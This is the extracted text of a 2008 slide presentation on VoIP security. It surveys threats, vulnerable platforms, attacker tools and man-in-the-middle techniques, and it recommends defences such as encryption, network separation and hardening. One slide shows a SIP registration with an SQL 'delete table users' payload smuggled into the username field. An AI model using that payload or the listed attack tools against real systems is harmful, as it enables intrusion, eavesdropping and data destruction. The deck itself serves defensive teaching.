VoIP Security: An Overview discusses the security challenges of Voice over IP (VoIP) technology. It notes that VoIP inherits vulnerabilities from TCP/IP networks and uses the corporate network, making it complex to secure. Common VoIP threats include denial of service attacks, interception attacks, covert channels, and vulnerabilities in VoIP platforms. The document outlines example attacks and tools used by hackers. It recommends countermeasures like network separation, encryption of SIP and RTP, firewalls, intrusion detection systems, and hardening VoIP infrastructure and devices. VoIP honeypots can also be used to detect attackers.

1. VoIP Security: An OverviewVoIP Security: An Overview
(2008)(2008)
Meletis BelsisMeletis Belsis
Information Security ConsultantInformation Security Consultant
MPhil / MSc / BScMPhil / MSc / BSc
CWNA/CWSP, C|EH, CCSA, ISO27001LACWNA/CWSP, C|EH, CCSA, ISO27001LA

2. AgendaAgenda
VoIP Technology
VoIP Complexity
VoIP Threats
Example Attacks
The Hacker’s Toolbox
VoIP Countermeasures
The Company

3. VoIP TechnologyVoIP Technology
• VoIP is an integral part of modern Enterprises
• VoIP allows the reduction of OpEx by providing PSTN
like services
• Based on open IETF and ITU standards
• Protocols used to support VoIP include
TCP/UDP/IP, DNS,TFTP, DHCP,STUN,HTTP,SIP,RTPTCP/UDP/IP, DNS,TFTP, DHCP,STUN,HTTP,SIP,RTP
• VoIP components include:
Routers, Switches, Firewalls, SIP Servers,
Media Gateways, iPBX, WiFi

4. VoIP SecurityVoIP Security
“ The flexibility of VoIP comes at a price: added
complexity in securing voice and data. Because
VoIP systems are connected to the data network
and share many of the same hardware and
software components, there are more ways for
intruders to attack a VoIP system than a
conventional voice telephone system or PBX “
NIST: Considerations for Voice over IP SystemsNIST: Considerations for Voice over IP Systems

5. VoIP Security ComplexityVoIP Security Complexity
• Securing a VoIP network is complex because:
– VoIP inherits the TCP/IP Vulnerabilitiesinherits the TCP/IP Vulnerabilities.
– VoIP uses the corporate networkuses the corporate network to operate. Usually
there is no network separation.
– Applying security may affect other attributes of VoIPaffect other attributes of VoIP
(e.g. Delay, Latency, Jitter).
– VoIP usually uses UDP communicationuses UDP communication and thus may
not be able to operate on networks that use firewalls.
Special proxy techniques like STUNSTUN need to be
applied.

6. VoIP ThreatsVoIP Threats
• Denial Of ServiceDenial Of Service
– Flood Attacks (i.e Controller Flooding)
– BYE Tear Down
– Registration Reject
– Hold Attack
– Call Reject
• Interception AttacksInterception Attacks
– Call Hijacking
– Registration Hijacking
– Media Session Hijacking
– Server Masquerading
– DNS Poisoning
– Caller ID Spoofing
– VoIP VLAN Hopping
– ARP Spoofing
• Covert ChannelsCovert Channels
• WiFi AttacksWiFi Attacks
SIP
server
SIP
server
Media
proxy
SIP signaling
Media Stream
Sniffing
(D)DoS attack
Wire
tapping
SPIT

7. VoIP ThreatsVoIP Threats
• VoIP Platforms Vulnerabilities
– CAN-2004-0056CAN-2004-0056: Malformed H.323 packet to exploit
Nortel BCM vulnerabilities
– CAN-2004-0054CAN-2004-0054: Exploits CISCO IOS H.323
implementation
– CVE-2007-4459CVE-2007-4459: Cisco SIP DoS vulnerabilities.
– CVE-2007-6424CVE-2007-6424: Vulnerabilities on the Fonality
Trixbox 2.0 PBX products
– CVE-2007-5361CVE-2007-5361: Vulnerabilities on the Alcatel- Lucent
OmniPCX Enterprise Communication Server.
– CVE-2007-5556CVE-2007-5556: Vulnerabilities on the Avaya VoIP
Handset.

8. Server MasqueradingServer Masquerading

9. Vlan HoppingVlan Hopping
SourceSource:: http://www.securityfocus.com/infocus/1892

10. SIP InjectionSIP Injection
UE’s initial Register Request looks like:
REGISTER SIP: home1.de SIP/2.0
Username=”user Authorization: Digest Username
user_private@home1.de”,
realm=”home1.de”, nonce=” “, uri=”SIP: home1.de”,
response=” “
Malicious Code infected with SQL injection looks like:
REGISTER SIP: home1.de SIP/2.0
Authorization: Digest
Username=”user_private@home1.de;delete table
users”, realm=”home1.de”, nonce=” “, uri=”SIP:
home1.de”, response=” “

11. Hacker’s ToolboxHacker’s Toolbox
• OrekaOreka : A cross-platform system for recording and retrieving audio
streams
• rtpBreakrtpBreak: detects, reconstructs and analyzes any RTP session through
heuristics over the UDP network traffic.
• SIPCrackSIPCrack : a SIP protocol login cracker
• SiVusSiVus : A SIP Vulnerability Scanner.
• BYE Teardown:BYE Teardown: disconnect an active VoIP conversation by spoofing the
SIP BYE message from the receiving party
• SipRogueSipRogue :multifunctional SIP proxy that can be inserted between two
talking parties
• RTPInjectRTPInject :attack tool that injects arbitrary audio into established RTP
connections.
• TFTP CrackerTFTP Cracker: A tool to attack VoIP endpoint and copy their
configuration through tftp
• ILTY(I am Listening to You)ILTY(I am Listening to You) : A multi-channel VoIP Sniffer
• Registration AdderRegistration Adder: A tool to allow fake registrations to be send
• VoIP HopperVoIP Hopper: Allows to hope from a normal VLAN to the VoIP Vlan

12. Hackers ToolboxHackers Toolbox
RTPInject SiVUS Scanner

13. 13
WiFi VoIPWiFi VoIP
NetStumblerNetStumbler
Is used by WarDriversIs used by WarDrivers
to detect unprotectedto detect unprotected
WiFi NetworksWiFi Networks
AirSnortAirSnort
Is widely used to
attack WEP
passwords

14. VoIP CountermeasuresVoIP Countermeasures
• Network SeparationNetwork Separation : Although dedicated
VoIP VLANs offer a level of security, a dedicate
VoIP network will be more secure.
• SIP EncryptionSIP Encryption: The TLS protocol can be used
to encrypt the SIP messages exchanged
between the nodes. TLS provides only Server
authentication. S/MIME is another option for SIP
encryption.
• RTP EncryptionRTP Encryption: Secure RTP(SRTP) can be
used to encrypt media in a VoIP network

15. VoIP CountermeasuresVoIP Countermeasures
• ManagementManagement: Avoid using weak management
protocols like Telnet, tftp and SNMP ver 2.
• FirewallsFirewalls: Ensure that VoIP components (i.e.
SIP Proxy, DNS, DHCP, Radius) are logically
located behind VoIP aware firewalls (e.g. CISCO
SIP Extensions for ASA).
• IDS/IPSIDS/IPS : The existent IDS/IPS architecture
can be extended using SIP Aware Sensors

16. VoIP CountermeasuresVoIP Countermeasures
• Hardening the network EnvironmentHardening the network Environment
– Enforce Security at the Network Equipment:
• Port Security
• DHCP Snooping
• Receive Access Lists
• Enable MAC Filtering
• Define the maximum number of MAC addresses per port.
• Enable 802.1x for VoIP devices
– Use AAA on all VoIP infrastructure Systems
– Disable the PC Port on VoIP phone with multiple ports.
– Harden the OS of the platforms used
• DNZ Zone Transfers
• IP to MAC mappings on DHCP
• Apply Security Patches / Updates
• Disable Telnet and/or r-utilities

17. • VoIP Honeypots
– VoIP Phones
– Fake SIP Proxies (i.e.
Asterix)
VoIP CountermeasuresVoIP Countermeasures

18. Extra MaterialExtra Material

19. Detecting WiFi NetworksDetecting WiFi Networks

20. 20
Detecting WiFi NetworksDetecting WiFi Networks

21. Bypassing MAC ACLsBypassing MAC ACLs

22. Being in the MiddleBeing in the Middle
• DNSDNS (modify entries to point all traffic to a hacker's
machine)
• DHCPDHCP (make all traffic go to hackers machine as
default gateway, or change DNS entry to point at
hacker's machine so all names resolve to hacker's
IP address)
• ARPARP (reply with hacker's MAC address, gratuitous
ARPs or regular ARP replies)
• Flood CAMFlood CAM tables in switches to destroy existing
MAC addr/port associations so all traffic is
broadcast out every port, and then use ARP attacks
• Routing protocolsRouting protocols (change routing such that traffic
physically passes through a router/machine
controlled by hacker)
• Spanning tree attacksSpanning tree attacks to change layer 2 forwarding
topology
• Physical insertionPhysical insertion (e.g. PC with dual NIC cards, be it
Ethernet based or WLAN-based)

23. Questions ?Questions ?